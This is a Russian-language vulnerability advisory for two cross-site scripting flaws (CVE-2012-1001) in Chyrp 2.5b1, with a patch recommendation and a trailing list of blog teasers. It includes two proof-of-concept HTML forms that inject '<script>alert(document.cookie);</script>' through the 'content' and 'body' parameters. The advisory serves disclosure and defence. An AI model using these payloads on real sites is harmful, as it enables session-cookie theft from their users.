Уязвимости

Межсайтовый скриптинг в Chyrp

Дата публикации:22.02.2012
Дата изменения: 24.02.2012
Всего просмотров: 633
Опасность: Средняя
Наличие исправления: Да
Количество уязвимостей: 2
CVSSv2 рейтинг: (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C) = Base:4.3/Temporal:3.4
(AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C) = Base:4.3/Temporal:3.4
CVE ID: CVE-2012-1001
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Chyrp 2.х

Уязвимые версии: Chyrp 2.5b1, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "content" в сценарии /includes/ajax.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:


<form action="http://[host]/includes/ajax.php" method="post">
<input type="hidden" name="action" value="preview" />
<input type="hidden" name="feather" value="" />
<input type="hidden" name="field" value="" />
<input type="hidden" name="content" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn"> 
</form>

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "body" в сценарии /includes/error.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:


<form action="http://[host]/includes/error.php" method="post">
<input type="hidden" name="ajax" value="1" />
<input type="hidden" name="body" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn"> 
</form>

URL производителя: http://chyrp.net/

Решение: Установите последнюю версию 2.1.2 или 2.5 Beta 2 с сайта производителя.

Ссылки:
http://chyrp.net/2012/02/02/heres-whats-been-going-on-recently/



Ваше имя:
Тип обращения:
Смайлики
Широкая улыбка  Скептически  Идея 
Вопрос  Восклицание  Шутливо 
Со злостью  Очень грустно  Смущенно 
Поцелуй  Здорово  Удивленно 
Печально  С улыбкой  sensored 
Защита от автоматических сообщений:
Защита от автоматических сообщений
Символы на картинке:

                                                                                                                                                                                                                                               

Блоги
23.05.2012
Сей краткий пост, адресован, тем кто, так или иначе  интересуется вопросами управления рисками ...
23.05.2012
Недавно словили тут парочку злоинсайдеров: «Роберт Квок, бывший директор по управлению бизнес-...
23.05.2012
Если рассматривать построение технической системы защиты ПД, то одно из возможных решений, направлен...
23.05.2012
Коллеги, вчера через свой твиттер ( http://twitter.com/#!/nnikiforov)  новый глава Минкомсвязи ...
22.05.2012
Защита информации вопрос комплексный и требует обеспечения непрерывности защитного контура во времен...
22.05.2012
Вот вы говорите "электронная демократия". А ведь возможен и электронный авторитаризм. И электронная ...
22.05.2012
Опубликована программа PHD на русском и английском языках.
Russian
http://www...
22.05.2012
Прокуратура Советского района города Астрахани выявила нарушения федерального закона «О персон...
22.05.2012
17-18 мая Stonesoft устраивал Hack the Lab в Хельсинки. По сути мероприятие состояло из 2-х частей:Н...
21.05.2012
Так всегда бывает, что человечество сначала придумывает какую-то гениальную идею, потом строит вокру...